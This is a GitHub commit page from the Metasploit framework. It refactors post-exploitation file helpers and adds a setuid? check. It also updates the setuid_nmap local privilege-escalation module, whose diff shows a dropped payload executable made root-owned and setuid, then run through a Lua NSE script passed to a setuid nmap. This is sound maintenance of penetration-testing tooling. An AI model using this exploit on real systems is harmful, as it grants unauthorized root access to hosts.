Skip to content

Commit 309deb9

Browse files
wvuwvu
committed
Land rapid7#9446, Post API fix for setuid_nmap
2 parents dee1ef0 + 5684b9e commit 309deb9

File tree

2 files changed

+38
-19
lines changed

2 files changed

+38
-19
lines changed

lib/msf/core/post/file.rb

Lines changed: 31 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -59,7 +59,7 @@ def dir(directory)
5959
#
6060
# @param path [String] Remote filename to check
6161
def directory?(path)
62-
if session.type == "meterpreter"
62+
if session.type == 'meterpreter'
6363
stat = session.fs.file.stat(path) rescue nil
6464
return false unless stat
6565
return stat.directory?
@@ -70,9 +70,9 @@ def directory?(path)
7070
f = session.shell_command_token("test -d \"#{path}\" && echo true")
7171
end
7272

73-
return false if f.nil? or f.empty?
73+
return false if f.nil? || f.empty?
7474
return false unless f =~ /true/
75-
return true
75+
true
7676
end
7777
end
7878

@@ -93,7 +93,7 @@ def expand_path(path)
9393
#
9494
# @param path [String] Remote filename to check
9595
def file?(path)
96-
if session.type == "meterpreter"
96+
if session.type == 'meterpreter'
9797
stat = session.fs.file.stat(path) rescue nil
9898
return false unless stat
9999
return stat.file?
@@ -107,20 +107,40 @@ def file?(path)
107107
f = session.shell_command_token("test -f \"#{path}\" && echo true")
108108
end
109109

110-
return false if f.nil? or f.empty?
110+
return false if f.nil? || f.empty?
111111
return false unless f =~ /true/
112-
return true
112+
true
113113
end
114114
end
115115

116116
alias file_exist? file?
117117

118+
#
119+
# See if +path+ on the remote system is a setuid file
120+
#
121+
# @param path [String] Remote filename to check
122+
def setuid?(path)
123+
if session.type == 'meterpreter'
124+
stat = session.fs.file.stat(path) rescue nil
125+
return false unless stat
126+
return stat.setuid?
127+
else
128+
if session.platform != 'windows'
129+
f = session.shell_command_token("test -u \"#{path}\" && echo true")
130+
end
131+
132+
return false if f.nil? || f.empty?
133+
return false unless f =~ /true/
134+
true
135+
end
136+
end
137+
118138
#
119139
# Check for existence of +path+ on the remote file system
120140
#
121141
# @param path [String] Remote filename to check
122142
def exist?(path)
123-
if session.type == "meterpreter"
143+
if session.type == 'meterpreter'
124144
stat = session.fs.file.stat(path) rescue nil
125145
return !!(stat)
126146
else
@@ -130,9 +150,9 @@ def exist?(path)
130150
f = cmd_exec("test -e \"#{path}\" && echo true")
131151
end
132152

133-
return false if f.nil? or f.empty?
153+
return false if f.nil? || f.empty?
134154
return false unless f =~ /true/
135-
return true
155+
true
136156
end
137157
end
138158

@@ -290,7 +310,7 @@ def write_file(file_name, data)
290310
end
291311

292312
end
293-
return true
313+
true
294314
end
295315

296316
#
@@ -314,7 +334,7 @@ def append_file(file_name, data)
314334
_write_file_unix_shell(file_name, data, true)
315335
end
316336
end
317-
return true
337+
true
318338
end
319339

320340
#

modules/exploits/unix/local/setuid_nmap.rb

Lines changed: 7 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -51,12 +51,11 @@ def initialize(info={})
5151
end
5252

5353
def check
54-
stat = session.fs.file.stat(datastore["Nmap"])
55-
if stat and stat.file? and stat.setuid?
56-
vprint_good("#{stat.prettymode} #{datastore["Nmap"]}")
54+
if setuid?(datastore['Nmap'])
55+
vprint_good("#{datastore['Nmap']} is setuid")
5756
return CheckCode::Vulnerable
5857
end
59-
return CheckCode::Safe
58+
CheckCode::Safe
6059
end
6160

6261
def exploit
@@ -69,16 +68,16 @@ def exploit
6968
write_file(exe_file, generate_payload_exe)
7069
evil_lua = %Q{
7170
os.execute("chown root:root #{exe_file}");
72-
os.execute("chmod 6777 #{exe_file}");
71+
os.execute("chmod 6700 #{exe_file}");
7372
os.execute("#{exe_file} &");
74-
os.execute("rm #{exe_file}");
73+
os.execute("rm -f #{exe_file}");
7574
}
7675
end
7776
lua_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.nse"
7877
print_status("Dropping lua #{lua_file}")
7978
write_file(lua_file, evil_lua)
8079

81-
print_status("running")
80+
print_status("Running #{lua_file} with Nmap")
8281

8382
scriptname = lua_file
8483
if (lua_file[0,1] == "/")
@@ -91,7 +90,7 @@ def exploit
9190
# Versions before 4.75 (August 2008) will not run scripts without a port scan
9291
cmd_exec "#{datastore["Nmap"]} --script #{scriptname} -p80 localhost #{datastore["ExtraArgs"]}"
9392
ensure
94-
cmd_exec "rm -f #{lua_file} #{exe_file}"
93+
rm_f(lua_file, exe_file)
9594
end
9695

9796
end

0 commit comments

Comments
 (0)